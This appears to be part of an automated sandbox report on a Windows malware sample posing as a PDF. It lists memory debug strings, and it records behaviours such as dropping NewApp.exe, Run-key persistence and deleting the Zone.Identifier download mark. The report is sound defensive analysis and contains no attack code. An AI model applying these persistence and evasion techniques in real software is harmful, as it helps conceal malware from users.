                      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 0000000A.00000003.685738561.0000000005184000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.829119339.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.832058326.0000000005764000.00000004.00000040.sdmp
                      Source: Binary string: iVisualBasic.pdb source: 0603321WG_0_1 pdf.exe, 00000000.00000002.670154182.00000000009A7000.00000004.00000010.sdmp, NewApp.exe, 0000000F.00000002.806394877.0000000000FD7000.00000004.00000010.sdmp, NewApp.exe, 00000013.00000002.806993531.0000000000537000.00000004.00000010.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 0000001F.00000003.806462338.0000000000A21000.00000004.00000001.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000A.00000003.685719663.0000000005021000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831487010.0000000005791000.00000004.00000001.sdmp
                      Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb0,J source: NewApp.exe, 0000000F.00000002.809881079.00000000014CF000.00000004.00000020.sdmp
                      Source: Binary string: wntdll.pdbk source: WerFault.exe, 0000000A.00000003.685719663.0000000005021000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.829119339.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831487010.0000000005791000.00000004.00000001.sdmp
                      Source: Binary string: rasadhlp.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: cldapi.pdbye source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb13Z source: 0603321WG_0_1 pdf.exe, 00000000.00000002.670963897.0000000000ED2000.00000004.00000020.sdmp
                      Source: Binary string: J0603321WG_0_1 pdf.PDB source: 0603321WG_0_1 pdf.exe, 00000000.00000002.670154182.00000000009A7000.00000004.00000010.sdmp
                      Source: Binary string: WinTypes.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: rasapi32.pdbV#jN source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp
                      Source: Binary string: cryptsp.pdbm source: WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp
                      Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: diasymreader.pdb_ source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: crypt32.pdbme"j source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp
                      Source: Binary string: }C:\Users\user\AppData\Roaming\NewApp\NewApp.PDB?p source: NewApp.exe, 00000013.00000002.806993531.0000000000537000.00000004.00000010.sdmp
                      Source: Binary string: mscorlib.pdbx source: WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp
                      Source: Binary string: .pdb, source: 0603321WG_0_1 pdf.exe, 00000000.00000002.670154182.00000000009A7000.00000004.00000010.sdmp
                      Source: Binary string: rsaenh.pdbk source: WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp
                      Source: Binary string: System.Xml.pdb&& source: WerFault.exe, 0000001F.00000003.829019707.0000000004DF3000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: System.Core.ni.pdb% source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: clrjit.pdbu source: WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: NewApp.exe, 0000000F.00000002.810619163.0000000001557000.00000004.00000020.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000A.00000003.685883855.0000000005180000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.829603052.0000000004DE0000.00000004.00000040.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb<Cwo source: NewApp.exe, 00000013.00000002.810490743.000000000088A000.00000004.00000020.sdmp
                      Source: Binary string: fwpuclnt.pdbH source: WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp
                      Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: 0603321WG_0_1 pdf.exe, 00000000.00000002.670979775.0000000000EE5000.00000004.00000020.sdmp, NewApp.exe, 0000000F.00000002.810472818.0000000001543000.00000004.00000020.sdmp, NewApp.exe, 00000013.00000002.810490743.000000000088A000.00000004.00000020.sdmp
                      Source: Binary string: shell32.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: winhttp.pdb6 source: WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp
                      Source: Binary string: NewApp.PDBI source: NewApp.exe, 0000000F.00000002.806394877.0000000000FD7000.00000004.00000010.sdmp
                      Source: Binary string: wimm32.pdbO5 source: WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.829603052.0000000004DE0000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: dhcpcsvc6.pdbD source: WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdbh source: WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb** source: 0603321WG_0_1 pdf.exe, 00000000.00000002.670942444.0000000000EBA000.00000004.00000020.sdmp
                      Source: Binary string: dnsapi.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: rasapi32.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: iLC:\Windows\Microsoft.VisualBasic.pdb source: 0603321WG_0_1 pdf.exe, 00000000.00000002.670154182.00000000009A7000.00000004.00000010.sdmp, NewApp.exe, 0000000F.00000002.806394877.0000000000FD7000.00000004.00000010.sdmp, NewApp.exe, 00000013.00000002.806993531.0000000000537000.00000004.00000010.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: System.Xml.ni.pdbT source: WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp
                      Source: Binary string: diasymreader.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: winhttp.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: edputil.pdb: source: WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp
                      Source: Binary string: Windows.StateRepositoryPS.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.ni.pdb% source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: System.Configuration.pdb;^ source: WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp
                      Source: Binary string: System.ni.pdbT3 source: WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp
                      Source: Binary string: rtutils.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: System.pdbx source: WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000001F.00000003.804994756.0000000000A15000.00000004.00000001.sdmp
                      Source: Binary string: profapi.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000A.00000003.685883855.0000000005180000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.829603052.0000000004DE0000.00000004.00000040.sdmp
                      Source: Binary string: WLDP.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 0000000A.00000003.685719663.0000000005021000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.829119339.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831487010.0000000005791000.00000004.00000001.sdmp
                      Source: Binary string: clrjit.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: fltLib.pdbg source: WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp
                      Source: Binary string: rasman.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdbs source: WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp
                      Source: Binary string: winnsi.pdb source: WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp
                      Source: Binary string: wmswsock.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: version.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: inaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb1 source: NewApp.exe, 0000000F.00000002.809881079.00000000014CF000.00000004.00000020.sdmp
                      Source: Binary string: wintrust.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: C:\Users\user\AppData\Roaming\NewApp\NewApp.PDBL source: NewApp.exe, 0000000F.00000002.806394877.0000000000FD7000.00000004.00000010.sdmp
                      Source: Binary string: System.Xml.pdb source: WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: System.pdb source: WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp
                      Source: Binary string: ore.ni.pdb source: WerFault.exe, 0000001F.00000003.829429051.0000000004E26000.00000004.00000001.sdmp
                      Source: Binary string: msasn1.pdbb source: WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: NewApp.exe, 00000013.00000002.810490743.000000000088A000.00000004.00000020.sdmp
                      Source: Binary string: ore.pdb source: WerFault.exe, 0000001F.00000003.829429051.0000000004E26000.00000004.00000001.sdmp
                      Source: Binary string: System.Windows.Forms.pdb source: WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000A.00000003.685883855.0000000005180000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.829603052.0000000004DE0000.00000004.00000040.sdmp
                      Source: Binary string: psapi.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: System.Configuration.pdbW% source: WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: 0603321WG_0_1 pdf.exe, 00000000.00000002.670979775.0000000000EE5000.00000004.00000020.sdmp, NewApp.exe, 0000000F.00000002.810619163.0000000001557000.00000004.00000020.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000A.00000003.685719663.0000000005021000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.829119339.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831487010.0000000005791000.00000004.00000001.sdmp
                      Source: Binary string: oleaut32.pdby source: WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp
                      Source: Binary string: cldapi.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: System.Core.pdbx source: WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000A.00000003.685719663.0000000005021000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.829119339.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831487010.0000000005791000.00000004.00000001.sdmp
                      Source: Binary string: mscoreei.pdb source: WerFault.exe, 0000000A.00000003.685719663.0000000005021000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.829119339.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831487010.0000000005791000.00000004.00000001.sdmp
                      Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 0000001F.00000003.806548362.0000000000A27000.00000004.00000001.sdmp
                      Source: Binary string: combase.pdbk source: WerFault.exe, 0000000A.00000003.685738561.0000000005184000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832058326.0000000005764000.00000004.00000040.sdmp
                      Source: Binary string: System.Core.pdb source: WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: System.Windows.Forms.pdbx source: WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp
                      Source: Binary string: OneCoreUAPCommonProxyStub.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: Microsoft.VisualBasic.pdb" source: WerFault.exe, 0000001F.00000003.829019707.0000000004DF3000.00000004.00000040.sdmp
                      Source: Binary string: System.Xml.ni.pdb" source: WerFault.exe, 0000001F.00000003.829019707.0000000004DF3000.00000004.00000040.sdmp
                      Source: Binary string: System.ni.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: clrjit.pdb/t)r source: WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: }}NewApp.PDB} source: NewApp.exe, 00000013.00000002.806993531.0000000000537000.00000004.00000010.sdmp
                      Source: Binary string: edputil.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: dhcpcsvc.pdb[e<jr source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp
                      Source: Binary string: crypt32.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp

                      Data Obfuscation:

                      Binary contains a suspicious time stamp
                      Source: initial sample Static PE information: 0x88460DE1 [Fri Jun 13 17:14:09 2042 UTC]
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe Code function: 0_2_05C005E1 push ds; ret
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe Code function: 15_2_072B267E pushad ; retf
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe Code function: 19_2_077F267F pushad ; retf
                      Source: initial sample Static PE information: section name: .text entropy: 6.81509040875
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe File created: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run NewApp

                      Hooking and other Techniques for Hiding and Protection:

                      Hides that the sample has been downloaded from the Internet (zone.identifier)
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe File opened: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe:Zone.Identifier read attributes | delete
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX (reported 20 times)
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Process information set: NOOPENFILEERRORBOX (reported 131 times)
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
